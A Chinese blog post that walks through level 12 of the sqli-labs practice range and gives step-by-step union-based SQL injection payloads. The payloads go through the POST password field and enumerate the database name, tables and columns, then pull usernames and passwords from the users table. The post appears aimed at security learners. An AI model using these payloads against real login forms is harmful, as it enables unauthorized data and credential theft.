6.24 sqllab靶场 12关

最新推荐文章于 2024-07-10 23:17:21 发布
最新推荐文章于 2024-07-10 23:17:21 发布
阅读量82 收藏
点赞数
文章标签: 数学建模
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ailkli/article/details/131361498
版权

 

目录

关卡特点:

 判断注入类型

判断字段值 

显示回显点

显示数据库:

显示数据库下所有表: 

显示表下的所有字段:

显示具体字段具体值:

关卡特点:

先输入用户名和密码进去,发现用户名和密码是使用POST的方式传上去

解题思路:使用burp抓包对post处进行注入,或者使用hackbar post参数进行注入

 判断注入类型

经过测试发现是字符型") --+型注入

判断字段值 

字段值是2

 

显示回显点

uname=admin&passwd=-1") union select 1,2 --+&submit=Submit

 

显示数据库:

uname=admin&passwd=-1") union select 1,database() --+&submit=Submit

 

显示数据库下所有表: 

uname=admin&passwd=-1") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&submit=Submit

 

显示表下的所有字段:

uname=admin&passwd=-1") union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --+&submit=Submit

 

显示具体字段具体值:

uname=admin&passwd=-1") union select 1,group_concat(username,password) from users  --+&submit=Submit

 

ailkli
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
QT6.24 mingw_64编译QtXlsx
07-11
在本文中,我们将深入探讨如何在基于Windows的系统上,使用MinGW 64位编译器(mingw_64)对Qt 6.24版本进行配置,以便编译并集成QtXlsx模块,实现对Excel文件的读写功能。 首先,我们需要确保已安装了Qt 6.24的...
6.24中远src.zip
06-24
很抱歉,但根据您给出的信息,"6.24中远src.zip"的描述太过简略,无法直接推断出具体包含的IT知识点。通常,"src"在IT领域中代表"源代码",可能是一个软件项目的源码目录。然而,没有更详细的信息,如编程语言、项目...
Sqli-labs靶场12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 531
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场1-12记录
SEV__en的博客
07-25 1648
攻击者通过注入SQL语句片段导致后端执行预期外的SQL查询。
sqli-labs靶场第十二
gou1791241251的博客
12-27 747
第十二与第十一差在了单引号和双引号, admin") or (select table_name from information_schema.tables where table_schema=database())=‘emails’ # 执行同样的操作即可查询出数据库的信息啦。
6.24sqllab 第13
ailkli的博客
06-24 114
布尔盲注。
6.24 sqllab第14
ailkli的博客
06-24 67
和正确的页面响应相同,说明注释和闭合方式正确。抓包进行尝试闭合方式和注释方式。用户密码随便输入不正确的。输入正确的用户名和密码。
6.24
zjc0201的博客
06-24 175
noip模擬    T1開始寫了個n方的暴力,後來畫圖發現每次改變都是在上一次基礎上的,然後比較最小那個值。那麼就可以用單調隊列來存,這樣就能保證第一個必為最小,然後每個值都要改就可以直接把比較標準改掉,這樣只要改一次就可以了,效率提高到了o(n),應該是可以A的。    T2求最短路還要是k的倍數,圖還保證是dag,看到數據範圍比價小,就想到直接記錄到每個點的完系最短路,再top一邊求最短路,後...
6.24作业
superZ1352582106的博客
06-24 180
bin/bash。
日记 6.24
2402_85865867的博客
06-24 96
今天下午踢🦶了场球赛,先发制人进了一球。明天加油💪('ω'💪)
6.24 ARM
weixin_45735759的博客
06-24 105
Qt6.24x64静态编译版本
07-25
基于LTS Qt6.24x64位静态编译,编译的软件不在依赖于DLL,可以在各windows版本上稳定运行
DS918 -6.24-25556引导+安装包
06-23
标题中的"DS918 -6.24-25556引导+安装包"指的是一款针对DS918设备的特定版本更新或升级软件。这里的"DS918"很可能是Synology DiskStation系列的一款型号,这是一台网络附加存储(NAS)设备,用于集中存储和管理数据...
懒人工作通OA Access版 v6.24
12-06
工作通OA网络智能办公系统是适用于企事业单位的通用型网络办公软件,融合了云创科技长期从事管理软件开发的丰富经验与先进技术,该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限制。...
数学建模美赛经验小结
最新发布
hello!
07-10 155
图片资料来自网络所听讲座,感谢分享!
数学建模学习手册】第三章:规划模型(一)
小小unicorn的博客
07-10 879
数学建模学习手册】第三章:规划模型(一)
PCA-主成分分析法
We1ky的博客
07-10 570
主成分分析(Principal Component Analysis, PCA)是一种统计技术,用于简化数据集,将原来具有多个变量的数据降维到较少的主要成分上。主成分分析是一种降维算法,它能将多个指标转换为少数几个主成分,。一般来说, 当研究的问题涉及到多变量且变量之间存在很强的相性时, 我们可考虑使用主成分分析的方法来对数据进行简化.
2024亚太杯数学建模竞赛(B题)的全面解析
qq_52590045的博客
07-05 1805
你是否在寻找数学建模比赛的突破点?数学建模进阶思路! 作为经验丰富的数学建模团队,我们将为你带来2024亚太杯数学建模竞赛(B题)的全面解析。这个解决方案包不仅包括完整的代码实现,还有详尽的建模过程和解析,帮助你全面理解并掌握如何解决类似问题。 本次B题第一问是分析附件 train.csv 中的数据,分析并可视化上述 20 个指标中,哪些指标与洪水的发生有着密切的联?哪些指标与洪水发生的相性不大?并分析可能的原因,然后针对洪水的提前预防,提出合理的建议和措施。 问题重述:根据附件 train
jxbrowser 6.24.3 maven
06-21
jxbrowser 6.24.3 maven则是指使用maven来构建jxbrowser 6.24.3版本的应用程序。 在使用jxbrowser 6.24.3 maven构建项目之前,需要在pom.xml文件中添加相依赖,包括jxbrowser的核心库、平台支持库、maven插件以及...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值